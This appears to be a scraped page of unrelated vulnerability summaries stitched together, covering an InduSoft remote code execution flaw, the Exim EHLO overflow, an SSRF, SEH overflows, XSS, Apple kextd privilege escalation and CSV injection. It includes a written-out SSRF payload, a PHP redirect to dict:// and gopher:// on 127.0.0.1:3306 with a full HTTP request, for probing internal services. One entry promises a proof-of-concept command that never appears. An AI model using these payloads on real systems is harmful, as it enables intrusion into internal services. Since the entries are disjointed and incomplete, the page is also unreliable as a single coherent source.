Tenable Research has discovered a critical remote code execution vulnerability in Schneider Electric’s InduSoft Web Studio and InTouch Machine Edition. The vulnerability can be remotely exploited without authentication to execute arbitrary commands on the target system. A malicious threat actor can completely compromise and gain control of the system, and use it as a pivot point to execute lateral transfer. The proof of concept is a command that can be used to exploit the vulnerability.
This exploit is a proof-of-concept for CVE-2018-6789, which is a buffer overflow vulnerability in the EHLO command of the SMTP protocol. The exploit works by sending an EHLO command with a long string of characters, which causes a buffer overflow and allows the attacker to overwrite the __malloc_hook pointer with the address of a one_gadget. This allows the attacker to execute arbitrary code on the target system.
You can edit a .php file on own server. The .php file's code example: <?php Header("Location: dict://127.0.0.1:3306/_0d%");?>. Request: GET /assets/lib/fuc.js.php?url=http://myserver/redirect.php HTTP/1.1 Host: myserver Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8 referer:http://myserver/index.php Modify the redirect.php file on the attacker's server.example: <?php Header("Location: gopher://127.0.0.1:3306/_0d%");?> If the curl function is available,then use gopher、tftp、http、https、dict、ldap、imap、pop3、smtp、telnet protocols method,if not then only use http、https、ftp protocol scan prot,example: <?php Header("Location: dict://127.0.0.1:3306/");?> If the curl function is unavailable,this vulnerability trigger need allow_url_fopen option is enable in php.ini,allow_url_fopen option defualt is enable.
Easy MPEG to DVD Burner 1.7.11 is vulnerable to a local buffer overflow vulnerability. By supplying a specially crafted input, an attacker can overwrite the SEH handler and execute arbitrary code. The vulnerability is caused due to a boundary error when handling user-supplied input, specifically when handling the username field. This can be exploited to cause a stack-based buffer overflow by supplying a long string of data as the username. This will overwrite the SEH handler and allow the attacker to execute arbitrary code.
A authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site. An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
Mach_portal exploit is a vulnerability in the ReportCrash daemon which is responsible for making crash dumps of crashing userspace processes. It is possible to gain a reference to the task port by sending a message to ReportCrash via their exception ports (either task or host level) and then using the error path which drops a UREF on the task and thread port arguments.
If the client has UID 0 but passes an invalid client port this code will drop a UREF on client port then return KERN_FAILURE. Returning KERN_FAILURE in MIG means all resources will be released which will cause client to be passed to mach_port_deallocate again, even though only one UREF was taken. An attacker can drop an extra UREF on any send rights in kextd for which the attacker also has a send right; you could use this to cause a name for a privileged service to be deallocated then cause the name to be reused to name a port you control. Exploitation of this would be a privesc from unentitled root to root with com.apple.rootless.kext-management and com.apple.rootless.storage.KernelExtensionManagement entitlements, which at least last time I looked was equaivalent to root.
Custom Forms version 1.12.20 is affected by the vulnerability Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
Navicat is vulnerable to a buffer overflow when a user creates a new Oracle connection and pastes a specially crafted string into the host field. This can be exploited to execute arbitrary code by an attacker.
Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability when an attacker has access to Settings page, and enters the payload via "Admin Site title" in Settings. Anyone who visit the target page will be affected to triage JavaScript code, including administrator, editor, developer, and guest.
Services By CQR